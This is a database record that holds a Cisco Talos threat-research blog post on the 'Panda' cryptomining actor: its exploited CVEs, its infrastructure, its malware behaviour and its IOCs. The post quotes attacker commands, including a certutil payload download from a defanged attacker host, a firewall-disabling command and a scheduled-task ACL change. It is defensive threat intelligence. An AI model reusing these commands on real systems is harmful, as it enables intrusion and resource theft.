DATABASE RESOURCES PRICING ABOUT US

{"id": "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "type": "talosblog", "bulletinFamily": "blog", "title": "Cryptocurrency miners aren\u2019t dead yet: Documenting the voracious but simple \u201cPanda\u201d", "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns. \n \n\n\n[](<https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s1600/image4.png>)\n\n## \n\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000. \n\n\n[](<https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s1600/image6.png>)\n\n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. \n\n\n[](<https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s1600/image5.png>)\n\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n\n\n[](<https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s1600/image8.png>)\n\n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The malware also modifies the access control list to grant full access to certain files through running cacsl.exe. \n \nFor example: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. \n \nThe malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n\n\n[](<https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s1600/image7.png>)\n\n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 &amp; Start C:\\Windows\\ugrpkute\\\\[filename].exe\". \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\" and passes it to Masscan to scan for port 445 and saves the results to \"results.txt.\" This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB,\", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club. \n \nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best. \n\n\n[](<https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s1600/image1.png>)\n\n[](<https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s1600/image3.png>)\n\n## \n\n\n## Conclusion\n\nPanda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated. \n \nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold. \n \nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and is quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations. \n\n\n## \n\n\n## COVERAGE\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://talosintelligence.com/resources/65>) \n \n\n\n[](<https://1.bp.blogspot.com/-VoLoSQumND8/XYDgUqa4CvI/AAAAAAAAB8I/dQAoulvM4nofqrokMtgPSQZJYLLOLLmZwCLcBGAsYHQ/s1600/image2.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as[ Next-Generation Firewall (NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n\n\n## IOCs\n\n### Domains\n\na45[.]bulehero[.]in \na46[.]bulehero[.]in \na47[.]bulehero[.]in \na48[.]bulehero[.]in \na88[.]bulehero[.]in \na88[.]heroherohero[.]info \na[.]bulehero[.]in \naic[.]fxxxxxxk[.]me \naxx[.]bulehero[.]in \nb[.]bulehero[.]in \nbulehero[.]in \nc[.]bulehero[.]in \ncb[.]fuckingmy[.].life \ncnm[.]idc3389[.]top \ndown[.]idc3389[.]top \nfid[.]hognoob[.]se \nfxxk[.]noilwut0vv[.]club \nhaq[.]hognoob[.]se \nidc3389[.]top \nidc3389[.]cc \nidc3389[.]pw \nli[.]bulehero2019[.]club \nlist[.]idc3389[.]top \nmi[.]oops[.]best \nmx[.]oops[.]best \nnrs[.]hognoob[.]se \noo[.]mygoodluck[.]best \npool[.]bulehero[.]in \npxi[.]hognoob[.]se \npxx[.]hognoob[.]se \nq1a[.]hognoob[.]se \nqie[.]fxxxxxxk[.]me \nrp[.]oiwcvbnc2e[.]stream \nuio[.]heroherohero[.]info \nuio[.]hognoob[.]se \nupa1[.]hognoob[.]se \nupa2[.]hognoob[.]se \nwiu[.]fxxxxxxk[.]me \nyxw[.]hognoob[.]se \nzik[.]fxxxxxxk[.]me \n\n\n### IPs\n\n184[.]168[.]221[.]47 \n172[.]104[.]87[.]6 \n139[.]162[.]123[.]87 \n139[.]162[.]110[.]201 \n116[.]193[.]154[.]122 \n95[.]128[.]126[.]241 \n195[.]128[.]127[.]254 \n195[.]128[.]126[.]120 \n195[.]128[.]126[.]243 \n195[.]128[.]124[.]140 \n139[.]162[.]71[.]92 \n3[.]123[.]17[.]223 \n46[.]173[.]217[.]80 \n5[.]56[.]133[.]246 \n\n\n### SHA-256\n\n2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1 \nfa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220 \n2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb \n829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08 \n8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec \n1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27 \n0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5 \nf9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a \n34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976 \na415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1 \n4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c \n8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21 \n991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e \na3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1 \n9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3 \nd5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d \n\n\n### Monero Wallets\n\n49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126 \n4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh \n44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L \n \n", "published": "2019-09-17T08:09:45", "modified": "2019-09-17T08:09:45", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3w3NM3N6VuY/panda-evolution.html", "reporter": "noreply@blogger.com (Nick Biasini)", "references": [], "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "lastseen": "2019-09-17T15:28:34", "viewCount": 604, "enchantments": {"dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879", "BAM-18242", "CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:7992242A-E0F4-4572-BE13-859467611F09", "AKB:9B4E2AEC-697D-42F0-9FED-B010FB1F82ED", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2017-1088", "CPAI-2019-0546"]}, {"type": "cisa", "idList": ["CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "CISA:6D325600F427E8426F81E5829305E20F", "CISA:99DAB57F9B8063F8619B1A418B014DF1"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"]}, {"type": "exploitdb", "idList": ["EDB-ID:43392", "EDB-ID:43458", "EDB-ID:43924", "EDB-ID:46780", "EDB-ID:46814"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "EXPLOITPACK:CB918002171E00C4EB94DA4B5828BA58", "EXPLOITPACK:E47A4ABCB334901131160C872A570166"]}, {"type": "f5", "idList": ["F5:K43451236", "F5:K90059138"]}, {"type": "fireeye", "idList": ["FIREEYE:2473273CA0F291BCEBB5F99AA3E4F256", "FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:42E1F284AEBD41C72EC6CD12CDCCD0A6", "FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "FIREEYE:C097B41677EDE5F95DB4B84AD6726751"]}, {"type": "github", "idList": ["GHSA-J77Q-2QQG-6989"]}, {"type": "githubexploit", "idList": ["20E0E007-A9C4-58EA-917F-E225D8785B3F", "24A6D0CC-8F53-539E-8FBC-D5222C4BC565", "4F4AF4AC-0953-5098-98D6-592B918B0836", "62E1CDF6-537F-52B5-8ACE-87CDDFB3544D", "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "96B2FD46-0F7E-5581-BBA6-E4A48966E225", "9D09C8C3-35C2-51CD-B6E1-6542183770EF", "D2931851-B196-5CD6-AF75-B24EA22F6115", "EEB220AD-2CB0-50FB-A3B9-A87BBC32BA19", "F0C27A65-B942-5D87-B7D9-08451A15456C"]}, {"type": "hackerone", "idList": ["H1:576887"]}, {"type": "hivepro", "idList": ["HIVEPRO:C72A6CAC86F253C92A64FF6B8FCDA675"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5230099254245458698", "KITPLOIT:5420210148456420402", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0FEB0AF7A8D15834DA7D1882395A9D7C", "MALWAREBYTES:4993027161793E66024E0B42522BB53D", "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE-", "MSF:EXPLOIT-MULTI-MISC-WEBLOGIC_DESERIALIZE_ASYNCRESPONSESERVICE-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201786819", "MYHACK58:62201890758", "MYHACK58:62201891264", "MYHACK58:62201993410", "MYHACK58:62201994562", "MYHACK58:62201994593"]}, {"type": "nessus", "idList": ["700055.PRM", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBLOGIC_CVE-2019-2725.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2019.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "STRUTS_2_5_10_1_RCE.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "WEBLOGIC_2017_10271.NASL", "WEBLOGIC_ASYNC_RESPONSE_RCE.NBIN", "WEB_APPLICATION_SCANNING_112704", "WEB_APPLICATION_SCANNING_112726"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2017-5638.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310108771", "OPENVAS:1361412562310140180", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310810748", "OPENVAS:1361412562310811244"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUAPR2017-3236618", "ORACLE:CPUAPR2020", "ORACLE:CPUJAN2020", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2017-3236622", "ORACLE:CPUJUL2019", "ORACLE:CPUJUL2019-5072835", "ORACLE:CPUJUL2020", "ORACLE:CPUJUL2021", "ORACLE:CPUOCT2017", "ORACLE:CPUOCT2017-3236626"]}, {"type": "osv", "idList": ["OSV:GHSA-J77Q-2QQG-6989"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:146143", "PACKETSTORM:152756"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "PENTESTIT:F5DFB26B34C75683830E664CBD58178F"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:09A996513FDD86534E6C20CD7200C36D", "QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED", "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5638"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:0FABA93E56CFEDDCAFAA28589FA1F1A2", "SAINT:3367EB0908CC68021EF65D9C41812230", "SAINT:37548F7E4861F75CE2B72672750C1CB3", "SAINT:484D58D595B8F6CEE787306160971308", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "securelist", "idList": ["SECURELIST:2782756D428D10F166A1D130F4307D33", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "SECURELIST:C7E3F6A27205B506CE8683317323C0BC"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804", "SSV:97009"]}, {"type": "symantec", "idList": ["SMNTC-101304", "SMNTC-108822"]}, {"type": "talosblog", "idList": ["TALOSBLOG:311242B8285F529AAB4833CDEBC9989C", "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "TALOSBLOG:7A681329F7813E49DED3E928ED08D453", "TALOSBLOG:7B703A19FAC4E490CFFB2AE43C1606DF", "TALOSBLOG:991CC85C1D7CC3CD70110C7FAE123FAC", "TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "TALOSBLOG:E398382645C9465F51D4AC68FBE13C7B"]}, {"type": "thn", "idList": ["THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:2707247140A4F620671B33D68FEB1EA9", "THN:2F8F4C57A4BFEE821BF1AB72DB36A273", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:4DE731C9D113C3993C96A773C079023F", "THN:515CD17353FD69BC2811599574546F0A", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:7FD924637D99697D78D53283817508DA", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:AF93AEDBDE6169AD1163D53979A4EA04", "THN:C3BFE86E2BE38F28D9CEB17AD2C50EBD", "THN:EEB3BA59922DDC6B345B8E6C153593DA", "THN:F03064A70C65D9BD62A8F5898BA276D2", "THN:F0450E1253FFE5CA527F039D3B3A72BD"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:15EF9F86D0EEBCD1CD450BF55954D1D2", "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:3E82813FD33FCC5937E06B9D667A547A", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:4844442F117316BC8EEC54269FACDAA8", "THREATPOST:4DD624E32718A8990263A37199EEBD02", 